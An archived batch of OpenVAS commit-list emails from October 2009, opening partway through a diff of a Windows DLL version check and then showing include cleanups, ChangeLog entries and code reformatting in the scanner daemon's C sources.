sec_hole == 0 ) { - security_hole(port:0, proto:"Win"); - sec_hole = 1; - } - security_hole(port:0, proto:"Win", data:"Version found : C$ "+filespec + " "+v+string("\n")+ - "Version expected : "+test_version+" or higher "+string("\n")); - } - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } - } else { - report = string(filespec+" not found/no access -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } + } + if("Service Pack 1" >< SP) + { + # Grep for Dnsapi.dll version < 5.2.3790.3092 + if(version_is_less(version:dllVer, test_version:"5.2.3790.3092")){ + security_hole(0); } } - -exit(0); + else + security_hole(0); +} From scm-commit at wald.intevation.org Mon Oct 5 10:45:04 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 10:45:04 +0200 (CEST) Subject: [Openvas-commits] r5362 - in trunk/openvas-scanner: cnvts/ssl_ciphers openvassd Message-ID: <20091005084504.A705885C72FF@pyrosoma.intevation.org> Author: felix Date: 2009-10-05 10:45:01 +0200 (Mon, 05 Oct 2009) New Revision: 5362 Modified: trunk/openvas-scanner/cnvts/ssl_ciphers/ssl_ciphers.c trunk/openvas-scanner/openvassd/comm.c trunk/openvas-scanner/openvassd/comm.h trunk/openvas-scanner/openvassd/hosts.c trunk/openvas-scanner/openvassd/locks.c trunk/openvas-scanner/openvassd/nasl_plugins.c trunk/openvas-scanner/openvassd/nes_plugins.c trunk/openvas-scanner/openvassd/ntp_11.c trunk/openvas-scanner/openvassd/ntp_11.h trunk/openvas-scanner/openvassd/parser.c trunk/openvas-scanner/openvassd/pluginlaunch.c trunk/openvas-scanner/openvassd/pluginload.c trunk/openvas-scanner/openvassd/pluginload.h trunk/openvas-scanner/openvassd/pluginscheduler.h trunk/openvas-scanner/openvassd/plugs_hash.c trunk/openvas-scanner/openvassd/plugs_req.h trunk/openvas-scanner/openvassd/preferences.c trunk/openvas-scanner/openvassd/rules.c trunk/openvas-scanner/openvassd/save_kb.h trunk/openvas-scanner/openvassd/shared_socket.c trunk/openvas-scanner/openvassd/users.c trunk/openvas-scanner/openvassd/users.h trunk/openvas-scanner/openvassd/utils.h Log: Towards removal of libopenvas.h. * openvassd/utils.h, openvassd/users.c, openvassd/users.h, openvassd/shared_socket.c, openvassd/save_kb.h, openvassd/rules.c, openvassd/preferences.c, openvassd/plugs_req.h,, openvassd/plugs_hash.c, openvassd/pluginscheduler.h, openvassd/pluginload.h, openvassd/pluginload.c, openvassd/pluginlaunch.c, openvassd/parser.c, openvassd/ntp_11.h, openvassd/ntp_11.c, openvassd/nes_plugins.c, openvassd/nasl_plugins.c, openvassd/locks.c, openvassd/hosts.c, openvassd/comm.h, openvassd/comm.c, cnvts/ssl_ciphers/ssl_ciphers.c: Added/cleaned up includes. Modified: trunk/openvas-scanner/cnvts/ssl_ciphers/ssl_ciphers.c =================================================================== --- trunk/openvas-scanner/cnvts/ssl_ciphers/ssl_ciphers.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/cnvts/ssl_ciphers/ssl_ciphers.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -6,9 +6,11 @@ * * This plugin was written by Michel Arboi */ - + #include "includes.h" +#include /* for emalloc */ + #ifndef ssl_get_cipher_by_char #define ssl_get_cipher_by_char(ssl,ptr) \ ((ssl)->method->get_cipher_by_char((unsigned char*)ptr)) Modified: trunk/openvas-scanner/openvassd/comm.c =================================================================== --- trunk/openvas-scanner/openvassd/comm.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/comm.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -33,17 +33,25 @@ #include +#include +#include /* for ACT_FIRST */ + #include "auth.h" -#include "rules.h" -#include "comm.h" -#include "sighand.h" + +#include "comm.h" +#include "network.h" /* for recv_line */ #include "ntp.h" #include "ntp_11.h" #include "log.h" #include "plugs_hash.h" +#include "pluginscheduler.h" /* for define LAUNCH_DISABLED */ +#include "plugutils.h" /* for plug_get_oid */ +#include "rules.h" +#include "sighand.h" +#include "system.h" /* for emalloc */ #include "utils.h" -#include + #ifndef FALSE #define FALSE 0 #endif Modified: trunk/openvas-scanner/openvassd/comm.h =================================================================== --- trunk/openvas-scanner/openvassd/comm.h 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/comm.h 2009-10-05 08:45:01 UTC (rev 5362) @@ -30,6 +30,9 @@ #ifndef _OPENVAS_COMM_H #define _OPENVAS_COMM_H +#include "ntp.h" /* for struct ntp_caps */ +#include /* for struct arglist */ + ntp_caps* comm_init(int); void comm_terminate(struct arglist *); void comm_send_pluginlist(struct arglist *); Modified: trunk/openvas-scanner/openvassd/hosts.c =================================================================== --- trunk/openvas-scanner/openvassd/hosts.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/hosts.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -28,6 +28,11 @@ */ #include + +#include /* for internal_recv */ +#include /* for INTERNAL_COMM_MSG_TYPE_CTRL */ +#include /* for estrdup */ + #include "utils.h" #include "log.h" #include "preferences.h" Modified: trunk/openvas-scanner/openvassd/locks.c =================================================================== --- trunk/openvas-scanner/openvassd/locks.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/locks.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -28,6 +28,9 @@ */ #include + +#include /* for efree */ + #include "utils.h" #include "log.h" Modified: trunk/openvas-scanner/openvassd/nasl_plugins.c =================================================================== --- trunk/openvas-scanner/openvassd/nasl_plugins.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/nasl_plugins.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -34,8 +34,14 @@ #include #include +#include /* for internal_send */ +#include /* for ACT_SCANNER */ +#include /* for INTERNAL_COMM_CTRL_FINISHED */ +#include /* for store_plugin */ +#include /* for emalloc */ #include "pluginload.h" +#include "pluginscheduler.h" /* for LAUNCH_DISABLED */ #include "plugs_hash.h" #include "preferences.h" #include "processes.h" Modified: trunk/openvas-scanner/openvassd/nes_plugins.c =================================================================== --- trunk/openvas-scanner/openvassd/nes_plugins.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/nes_plugins.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -29,9 +29,12 @@ #include +#include "libopenvas.h" + #include #include "pluginload.h" +#include "pluginscheduler.h" /* for LAUNCH_DISABLED */ #include "plugs_hash.h" #include "processes.h" #include "log.h" Modified: trunk/openvas-scanner/openvassd/ntp_11.c =================================================================== --- trunk/openvas-scanner/openvassd/ntp_11.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/ntp_11.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -31,6 +31,10 @@ #include +#include /* for recv_line */ +#include /* for plug_get_name */ +#include /* for emalloc */ + #include "ntp.h" #include "ntp_11.h" #include "otp_1_0.h" Modified: trunk/openvas-scanner/openvassd/ntp_11.h =================================================================== --- trunk/openvas-scanner/openvassd/ntp_11.h 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/ntp_11.h 2009-10-05 08:45:01 UTC (rev 5362) @@ -30,6 +30,9 @@ #ifndef _OPENVAS_NTP_11_H #define _OPENVAS_NTP_11_H + +#include /* for struct arglist */ + #define NTP_STOP_WHOLE_TEST 2 int ntp_11_parse_input(struct arglist *, char *); Modified: trunk/openvas-scanner/openvassd/parser.c =================================================================== --- trunk/openvas-scanner/openvassd/parser.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/parser.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -29,6 +29,8 @@ #include +#include /* for emalloc */ + /** @TODO Contents of this file is duplicate in openvas-scanner/openvassd/parser.c * and openvas-client/openvas/parser.c . Move to libraries and merge, once * openvas-client depends on libraries. */ Modified: trunk/openvas-scanner/openvassd/pluginlaunch.c =================================================================== --- trunk/openvas-scanner/openvassd/pluginlaunch.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/pluginlaunch.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -28,6 +28,12 @@ */ #include + +#include /* for internal_send */ +#include /* for ACT_SCANNER */ +#include /* for INTERNAL_COMM_MSG_SHARED_SOCKET */ +#include /* for efree */ + #include "pluginload.h" #include "piic.h" #include "utils.h" Modified: trunk/openvas-scanner/openvassd/pluginload.c =================================================================== --- trunk/openvas-scanner/openvassd/pluginload.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/pluginload.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -30,6 +30,7 @@ #include #include +#include /* for emalloc */ #include Modified: trunk/openvas-scanner/openvassd/pluginload.h =================================================================== --- trunk/openvas-scanner/openvassd/pluginload.h 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/pluginload.h 2009-10-05 08:45:01 UTC (rev 5362) @@ -31,6 +31,9 @@ #ifndef _OPENVAS_PLUGINLOAD_H #define _OPENVAS_PLUGINLOAD_H +#include /* for struct arglist */ +#include /* for struct kb_item */ + struct arglist * plugins_init(struct arglist *, int); struct arglist * plugins_reload(struct arglist *, struct arglist *, int); void plugin_set_socket(struct arglist *, int); Modified: trunk/openvas-scanner/openvassd/pluginscheduler.h =================================================================== --- trunk/openvas-scanner/openvassd/pluginscheduler.h 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/pluginscheduler.h 2009-10-05 08:45:01 UTC (rev 5362) @@ -31,6 +31,15 @@ #ifndef PLUGINSCHEDULER_H #define PLUGINSCHEDULER_H +/** + * @brief States of scheduler_plugin. + * + * @todo Consider creating an enumeration. + */ +#define LAUNCH_DISABLED 0 +#define LAUNCH_RUN 1 +#define LAUNCH_SILENT 2 + struct scheduler_plugin { int running_state; int category; Modified: trunk/openvas-scanner/openvassd/plugs_hash.c =================================================================== --- trunk/openvas-scanner/openvassd/plugs_hash.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/plugs_hash.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -29,6 +29,11 @@ #include + +#include /* for auth_printf */ +#include /* for send_fd */ +#include /* for efree */ + #include #include "users.h" #include "log.h" Modified: trunk/openvas-scanner/openvassd/plugs_req.h =================================================================== --- trunk/openvas-scanner/openvassd/plugs_req.h 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/plugs_req.h 2009-10-05 08:45:01 UTC (rev 5362) @@ -31,6 +31,9 @@ #ifndef PLUGINS_REQUIREMENTS_H__ #define PLUGINS_REQUIREMENTS_H__ +#include /* for struct kb_item */ +#include /* for struct arglist */ + char * requirements_plugin(struct kb_item **, struct scheduler_plugin *, struct arglist *); Modified: trunk/openvas-scanner/openvassd/preferences.c =================================================================== --- trunk/openvas-scanner/openvassd/preferences.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/preferences.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -45,7 +45,9 @@ */ #include + #include +#include /* for efree */ #include "glib.h" #include "comm.h" Modified: trunk/openvas-scanner/openvassd/rules.c =================================================================== --- trunk/openvas-scanner/openvassd/rules.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/rules.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -29,6 +29,9 @@ #include + +#include /* for efree */ + #include #include "comm.h" #include "utils.h" Modified: trunk/openvas-scanner/openvassd/save_kb.h =================================================================== --- trunk/openvas-scanner/openvassd/save_kb.h 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/save_kb.h 2009-10-05 08:45:01 UTC (rev 5362) @@ -31,6 +31,8 @@ #ifndef SAVE_KB_H__ #define SAVE_KB_H__ +#include /* for struct arglist */ + int save_kb_new(struct arglist*, char *); void save_kb_close(struct arglist*, char*); Modified: trunk/openvas-scanner/openvassd/shared_socket.c =================================================================== --- trunk/openvas-scanner/openvassd/shared_socket.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/shared_socket.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -35,6 +35,12 @@ */ #include + +#include /* internal_recv */ +#include /* for INTERNAL_COMM_MSG_SHARED_SOCKET */ +#include /* for recv_fd */ +#include /* for efree */ + #include "utils.h" #include "log.h" Modified: trunk/openvas-scanner/openvassd/users.c =================================================================== --- trunk/openvas-scanner/openvassd/users.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/users.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -29,6 +29,9 @@ #include + +#include /* for emalloc */ + #include #include "log.h" #include "users.h" Modified: trunk/openvas-scanner/openvassd/users.h =================================================================== --- trunk/openvas-scanner/openvassd/users.h 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/users.h 2009-10-05 08:45:01 UTC (rev 5362) @@ -30,6 +30,9 @@ #ifndef _OPENVAS_USERS_H #define _OPENVAS_USERS_H + +#include /* for struct arglist */ + #define BAD_LOGIN_ATTEMPT (struct openvas_rules*)(-1) #define OPENVAS_MAX_USERNAME_LEN 32 /* Including the ending nul byte! */ Modified: trunk/openvas-scanner/openvassd/utils.h =================================================================== --- trunk/openvas-scanner/openvassd/utils.h 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/utils.h 2009-10-05 08:45:01 UTC (rev 5362) @@ -31,6 +31,9 @@ #ifndef _OPENVAS_UTILS_H #define _OPENVAS_UTILS_H +#include "ntp.h" /* for struct ntp_caps */ +#include /* for struct arglist */ + struct attack_atom { char * name; From scm-commit at wald.intevation.org Mon Oct 5 11:09:09 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 11:09:09 +0200 (CEST) Subject: [Openvas-commits] r5363 - in trunk/openvas-scanner: . openvassd Message-ID: <20091005090909.649FF861EAB6@pyrosoma.intevation.org> Author: felix Date: 2009-10-05 11:09:07 +0200 (Mon, 05 Oct 2009) New Revision: 5363 Modified: trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/openvassd/piic.c trunk/openvas-scanner/openvassd/pluginscheduler.c trunk/openvas-scanner/openvassd/plugs_req.c trunk/openvas-scanner/openvassd/save_kb.c trunk/openvas-scanner/openvassd/save_tests.c trunk/openvas-scanner/openvassd/utils.c Log: * openvassd/pluginscheduler.c, openvassd/plugs_req.c, openvassd/save_kb.c, openvassd/save_tests.c, openvassd/utils.c, openvassd/piic.c: Cosmetics, doc, todos added. * ChangeLog: corrected with last entry. Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2009-10-05 08:45:01 UTC (rev 5362) +++ trunk/openvas-scanner/ChangeLog 2009-10-05 09:09:07 UTC (rev 5363) @@ -1,3 +1,25 @@ +2009-10-05 Felix Wolfsteller + + * openvassd/pluginscheduler.c, openvassd/plugs_req.c, + openvassd/save_kb.c, openvassd/save_tests.c, openvassd/utils.c, + openvassd/piic.c: Cosmetics, doc, todos added. + + * ChangeLog: corrected with last entry. + +2009-10-05 Felix Wolfsteller + + Towards removal of libopenvas.h. + + * openvassd/utils.h, openvassd/users.c, openvassd/users.h, + openvassd/shared_socket.c, openvassd/save_kb.h, openvassd/rules.c, + openvassd/preferences.c, openvassd/plugs_req.h,, openvassd/plugs_hash.c, + openvassd/pluginscheduler.h, openvassd/pluginload.h, + openvassd/pluginload.c, openvassd/pluginlaunch.c, openvassd/parser.c, + openvassd/ntp_11.h, openvassd/ntp_11.c, openvassd/nes_plugins.c, + openvassd/nasl_plugins.c, openvassd/locks.c, openvassd/hosts.c, + openvassd/comm.h, openvassd/comm.c, cnvts/ssl_ciphers/ssl_ciphers.c: + Added/cleaned up includes. + 2009-09-28 Jan-Oliver Wagner Post-release version bump. Modified: trunk/openvas-scanner/openvassd/piic.c =================================================================== --- trunk/openvas-scanner/openvassd/piic.c 2009-10-05 08:45:01 UTC (rev 5362) +++ trunk/openvas-scanner/openvassd/piic.c 2009-10-05 09:09:07 UTC (rev 5363) @@ -29,105 +29,118 @@ #include + #include "log.h" #include "save_kb.h" #include "utils.h" #include "piic.h" - -void kb_parse(int soc, struct arglist * globals, struct kb_item ** kb, char * buf, int msg ) +/** + * @brief Modifies the knowledge base or sends content of a kb item. + * + * If the knowledge base is going to be saved to disc, modify the entry on the + * file system, too. + * + * @param soc "Internal" socket to the child process that queries the kb or + * requests modification. + * @param msg Explicitly handled if INTERNAL_COMM_KB_GET, + * INTERNAL_COMM_KB_REPLACE (defined in plugutils.h) + */ +void +kb_parse (int soc, struct arglist * globals, struct kb_item ** kb, char * buf, + int msg) { - char * t; - int type; - char *c; - int buf_len; - char * copy; - char * name; - char * value; - - if( buf == NULL || kb == NULL ) - return; + char * t; + int type; + char *c; + int buf_len; + char * copy; + char * name; + char * value; - if ( msg & INTERNAL_COMM_KB_GET ) - { - struct kb_item * kitem = kb_item_get_single(kb, buf, 0); + if (buf == NULL || kb == NULL) + return; - if ( kitem == NULL ) - { - internal_send(soc, NULL, INTERNAL_COMM_MSG_TYPE_KB|INTERNAL_COMM_KB_ERROR); - return; - } - - if ( kitem->type == KB_TYPE_STR ) - { - internal_send(soc, kitem->v.v_str, INTERNAL_COMM_MSG_TYPE_KB|INTERNAL_COMM_KB_SENDING_STR); - return; - } - else if ( kitem->type == KB_TYPE_INT ) - { - char buf[64]; - snprintf(buf, sizeof(buf), "%d", kitem->v.v_int); - internal_send(soc, buf, INTERNAL_COMM_MSG_TYPE_KB|INTERNAL_COMM_KB_SENDING_INT); - } - else - internal_send(soc, NULL, INTERNAL_COMM_MSG_TYPE_KB|INTERNAL_COMM_KB_ERROR); - return; - } - - if ( buf[0] == '\0' ) + if (msg & INTERNAL_COMM_KB_GET) + { + struct kb_item * kitem = kb_item_get_single (kb, buf, 0); + + if (kitem == NULL) + { + internal_send (soc, NULL, INTERNAL_COMM_MSG_TYPE_KB|INTERNAL_COMM_KB_ERROR); + return; + } + + if (kitem->type == KB_TYPE_STR) + { + internal_send (soc, kitem->v.v_str, INTERNAL_COMM_MSG_TYPE_KB|INTERNAL_COMM_KB_SENDING_STR); + return; + } + else if (kitem->type == KB_TYPE_INT) + { + char buf[64]; + snprintf (buf, sizeof (buf), "%d", kitem->v.v_int); + internal_send (soc, buf, INTERNAL_COMM_MSG_TYPE_KB|INTERNAL_COMM_KB_SENDING_INT); + } + else + internal_send (soc, NULL, INTERNAL_COMM_MSG_TYPE_KB|INTERNAL_COMM_KB_ERROR); + + return; + } + + if (buf[0] == '\0') return; - - buf_len = strlen(buf); - - if(buf[buf_len - 1]=='\n') - buf[ buf_len - 1 ]='\0'; - - c = strrchr(buf, ';'); - if(c != NULL ) + + buf_len = strlen (buf); + + if (buf[buf_len - 1] == '\n') + buf[buf_len - 1] = '\0'; + + c = strrchr (buf, ';'); + if (c != NULL) c[0] = '\0'; - - t = strchr(buf, ' '); - if( t == NULL ) + + t = strchr(buf, ' '); + if (t == NULL) return; - - t[0] = '\0'; - type = atoi(buf); - t[0] = ' '; + t[0] = '\0'; + type = atoi (buf); + t[0] = ' '; - value = strchr(buf, '='); - - if( value == NULL ) - return; - + value = strchr (buf, '='); + + if (value == NULL) + return; + value[0]='\0'; value++; - + name = t+1; - - if ( type == ARG_INT ) - { - int v = atoi(value); - if ( msg & INTERNAL_COMM_KB_REPLACE ) - kb_item_set_int(kb, name,v); - else - { - kb_item_add_int(kb, name,v); - if(save_kb(globals))save_kb_write_int(globals, arg_get_value(globals, "CURRENTLY_TESTED_HOST"), name,v); - } - } + + if (type == ARG_INT) + { + int v = atoi (value); + if (msg & INTERNAL_COMM_KB_REPLACE) + kb_item_set_int(kb, name,v); + else + { + kb_item_add_int(kb, name,v); + if (save_kb(globals)) + save_kb_write_int (globals, arg_get_value (globals, "CURRENTLY_TESTED_HOST"), name,v); + } + } else - { - copy = rmslashes(value); - if ( msg & INTERNAL_COMM_KB_REPLACE ) - kb_item_set_str(kb, name, copy); - else - { - kb_item_add_str(kb, name, copy); - if(save_kb(globals))save_kb_write_str(globals, arg_get_value(globals, "CURRENTLY_TESTED_HOST"), name, copy); - } - efree(©); - } + { + copy = rmslashes (value); + if (msg & INTERNAL_COMM_KB_REPLACE) + kb_item_set_str (kb, name, copy); + else + { + kb_item_add_str (kb, name, copy); + if (save_kb (globals)) + save_kb_write_str (globals, arg_get_value (globals, "CURRENTLY_TESTED_HOST"), name, copy); + } + efree (©); + } } - - Modified: trunk/openvas-scanner/openvassd/pluginscheduler.c =================================================================== --- trunk/openvas-scanner/openvassd/pluginscheduler.c 2009-10-05 08:45:01 UTC (rev 5362) +++ trunk/openvas-scanner/openvassd/pluginscheduler.c 2009-10-05 09:09:07 UTC (rev 5363) @@ -104,10 +104,10 @@ int i; if(h == NULL) return; - + if(h->next != NULL) hash_link_destroy(h->next); - + if( h->dependencies != NULL ) { for(i=0;h->dependencies[i] != NULL;i++) @@ -119,7 +119,7 @@ efree(&h->dependencies_ptr); efree(&h->plugin); - + if( h->ports != NULL ) { for(i=0;h->ports[i] != NULL;i++) @@ -128,14 +128,15 @@ } efree(&h->ports); } - + efree(&h); } -static void hash_destroy(struct hash * h) +static void +hash_destroy (struct hash * h) { int i; - + for(i=0;iarglist->value); struct arglist * ports = plug_get_required_ports(plugin->arglist->value); int num_deps = 0; - + l->plugin = plugin; l->plugin->parent_hash = l; l->name = name; l->next = h[idx].next; h[idx].next = l; l->dependencies_ptr = NULL; - + if( deps == NULL ) l->dependencies = NULL; else @@ -166,7 +168,7 @@ struct arglist * al = deps; int i = 0; while (al->next) - { + { num_deps ++; al = al->next; } @@ -179,7 +181,7 @@ al = al->next; } } - + if( ports == NULL ) l->ports = NULL; else @@ -192,7 +194,7 @@ num_ports ++; al = al->next; } - + l->ports = emalloc((num_ports + 1) * sizeof(char*)); al = ports; while (al->next != NULL ) @@ -207,7 +209,8 @@ -static struct hash * _hash_get(struct hash * h, char * name) +static struct hash * +_hash_get (struct hash * h, char * name) { unsigned int idx = mkhash(name); struct hash * l = h[idx].next; @@ -222,20 +225,22 @@ } -static struct hash ** hash_get_deps_ptr(struct hash * h, char * name) +static struct hash ** +hash_get_deps_ptr (struct hash * h, char * name) { struct hash * l = _hash_get(h, name); - + if( l == NULL ) return NULL; - + if( l->dependencies_ptr == NULL ) return NULL; - + return l->dependencies_ptr; } -static void hash_fill_deps(struct hash * h, struct hash * l ) +static void +hash_fill_deps (struct hash * h, struct hash * l ) { int i, j = 0; if ( l->num_deps != 0 ) @@ -320,7 +325,7 @@ pl->prev = NULL; sched->plist = pl; } - } + } } void scheduler_rm_running_ports(plugins_scheduler_t sched, struct scheduler_plugin * plugin) @@ -328,18 +333,15 @@ char ** ports; int i; - ports = plugin->parent_hash->ports; - if( ports == NULL ) return; - + for (i = 0 ; ports[i] != NULL ; i ++ ) { struct plist * pl = pl_get(sched->plist, ports[i]); - - + if( pl != NULL ) { pl->occurences --; @@ -347,7 +349,7 @@ { if( pl->next != NULL ) pl->next->prev = pl->prev; - + if( pl->prev != NULL ) pl->prev->next = pl->next; else @@ -373,20 +375,19 @@ char ** ports = hash_get_ports(sched->hash, plugin->arglist->name); int i; int score = 0; - + if( ports == NULL ) return 0; - for (i = 0; ports[i] != NULL; i ++) { struct plist * pl = pl_get(sched->plist, ports[i]); if(pl != NULL) - { + { if(pl->occurences > score) score = pl->occurences; } - } + } return score; } @@ -408,7 +409,10 @@ -struct scheduler_plugin * plugin_next_unrun_dependencie(plugins_scheduler_t sched, struct hash ** dependencies_ptr, int already_in_dependencie) +struct scheduler_plugin * +plugin_next_unrun_dependencie (plugins_scheduler_t sched, + struct hash ** dependencies_ptr, + int already_in_dependencie) { int flag = 0; int counter = 0; @@ -416,7 +420,7 @@ if(dependencies_ptr == NULL) return NULL; - + for(i=0;dependencies_ptr[i] != NULL;i++) { struct scheduler_plugin * plugin = dependencies_ptr[i]->plugin; @@ -437,7 +441,7 @@ ret = plugin_next_unrun_dependencie(sched, deps_ptr, 1); if(ret == NULL) return plugin; - else + else if( ret == PLUG_RUNNING ) flag ++; else @@ -456,7 +460,7 @@ } } } - + if(flag == 0) return NULL; else @@ -468,7 +472,10 @@ /* * Enables a plugin and its dependencies */ -static void enable_plugin_and_dependencies(plugins_scheduler_t shed, struct arglist * plugin, char * name, int silent) +static void +enable_plugin_and_dependencies (plugins_scheduler_t shed, + struct arglist * plugin, + char * name, int silent) { struct hash ** deps_ptr; int i; @@ -486,7 +493,7 @@ else plug_set_launch(plugin, LAUNCH_SILENT); } - + if(deps_ptr != NULL) { for(i=0;deps_ptr[i] != NULL;i++) @@ -506,17 +513,13 @@ struct arglist * arg; int i; struct hash * l; - - - - + + if(plugins == NULL) return NULL; - - - /* - * Fill our lists - */ + + + /* Fill our lists */ ret->hash = hash_init(); arg = plugins; while(arg->next != NULL) @@ -524,7 +527,7 @@ struct scheduler_plugin * scheduler_plugin; struct list * dup; int category = plug_get_category(arg->value); - + scheduler_plugin = emalloc ( sizeof(struct scheduler_plugin) ) ; scheduler_plugin->arglist = arg; scheduler_plugin->running_state = PLUGIN_STATUS_UNRUN; @@ -551,8 +554,8 @@ hash_add(ret->hash, arg->name, scheduler_plugin); arg = arg->next; } - - + + for ( i = 0 ; i < HASH_MAX ; i ++ ) { l = &ret->hash[i]; @@ -572,8 +575,8 @@ arg = arg->next; } } - - + + /* Now, remove the plugins that won't be launched */ for(i= ACT_FIRST ; i <= ACT_LAST ; i++) { @@ -602,31 +605,30 @@ l = l->next; } } - + return ret; } -struct scheduler_plugin * plugins_scheduler_next(plugins_scheduler_t h) +struct scheduler_plugin * +plugins_scheduler_next (plugins_scheduler_t h) { - struct list * l; int category; int running_category = ACT_LAST; int flag = 0; - + if(h == NULL) return NULL; - + for(category = ACT_FIRST;category<=ACT_LAST;category++) { l = h->list[category]; - + /* * Scanners (and DoS) must not be run in parallel */ - if((category == ACT_SCANNER) || (category == ACT_KILL_HOST) || (category == ACT_FLOOD) || @@ -634,25 +636,23 @@ pluginlaunch_disable_parrallel_checks(); else pluginlaunch_enable_parrallel_checks(); - - + while(l != NULL) { int state; - + state = plugin_get_running_state(l->plugin); - - + switch(state) { case PLUGIN_STATUS_UNRUN: { struct hash ** deps_ptr = l->plugin->parent_hash->dependencies_ptr; - + if(deps_ptr != NULL) { struct scheduler_plugin * p = plugin_next_unrun_dependencie(h, deps_ptr, 0); - + switch(GPOINTER_TO_SIZE(p)) { case GPOINTER_TO_SIZE(NULL) : @@ -706,8 +706,7 @@ l->prev->next = l->next; else h->list[category] = l->next; - - + if(l->next != NULL) l->next->prev = l->prev; @@ -718,10 +717,10 @@ } break; } - l = l->next; + l = l->next; } - + /* Could not find anything */ if((category == ACT_SCANNER || category == ACT_INIT || @@ -731,19 +730,20 @@ flag = 0; category --; } - + if(category + 1 >= ACT_DENIAL && flag && running_category < ACT_DENIAL) - { - return PLUG_RUNNING; + { + return PLUG_RUNNING; } } - + return flag != 0 ? PLUG_RUNNING : NULL; } -void list_destroy(struct list * list) +void +list_destroy (struct list * list) { while(list != NULL) { @@ -754,7 +754,8 @@ } -void plugins_scheduler_free(plugins_scheduler_t sched) +void +plugins_scheduler_free (plugins_scheduler_t sched) { int i; hash_destroy(sched->hash); @@ -762,6 +763,3 @@ list_destroy(sched->list[i]); efree(&sched); } - - - Modified: trunk/openvas-scanner/openvassd/plugs_req.c =================================================================== --- trunk/openvas-scanner/openvassd/plugs_req.c 2009-10-05 08:45:01 UTC (rev 5362) +++ trunk/openvas-scanner/openvassd/plugs_req.c 2009-10-05 09:09:07 UTC (rev 5363) @@ -27,8 +27,9 @@ * */ - + #include + #include "pluginscheduler.h" #include "plugs_req.h" @@ -37,55 +38,48 @@ Private Functions ***********************************************************/ - + extern int kb_get_port_state_proto(struct kb_item **, struct arglist*, int, char*); - + /*--------------------------------------------------------- Returns whether a port in a port list is closed or not ----------------------------------------------------------*/ static int -get_closed_ports(kb, ports, preferences) - struct kb_item ** kb; - struct arglist * ports; - struct arglist * preferences; +get_closed_ports (struct kb_item ** kb, struct arglist * ports, + struct arglist * preferences) { if(ports == NULL) return -1; - + while(ports->next != NULL) { - int iport = atoi(ports->name); + int iport = atoi(ports->name); if(iport != 0) { if( kb_get_port_state_proto(kb, preferences, iport, "tcp") != 0 ) return iport; } - else + else { - if( kb_item_get_int(kb, ports->name) > 0 ) return 1; /* should be the actual value indeed ! */ - } + } ports = ports->next; } return 0; /* found nothing */ } -/*----------------------------------------------------------- - - Returns whether a port in a port list is closed or not - - ------------------------------------------------------------*/ +/** + * @brief Returns whether a port in a port list is closed or not. + */ static int -get_closed_udp_ports(kb, ports, preferences) - struct kb_item ** kb; - struct arglist * ports; - struct arglist * preferences; -{ +get_closed_udp_ports (struct kb_item ** kb, struct arglist * ports, + struct arglist * preferences) +{ if( ports == NULL ) return -1; else while( ports->next != NULL) @@ -98,16 +92,11 @@ } -/*----------------------------------------------------------- - - Returns the name of the first key - which is not in - - -----------------------------------------------------------*/ -static char * -key_missing(kb, keys) - struct kb_item ** kb; - struct arglist * keys; +/** + * @brief Returns the name of the first key which is not \ref kb. + */ +static char * +key_missing (struct kb_item ** kb, struct arglist * keys) { if(kb == NULL || keys == NULL ) return NULL; @@ -123,14 +112,11 @@ return NULL; } -/*----------------------------------------------------------- - - The opposite of the previous function - - -----------------------------------------------------------*/ 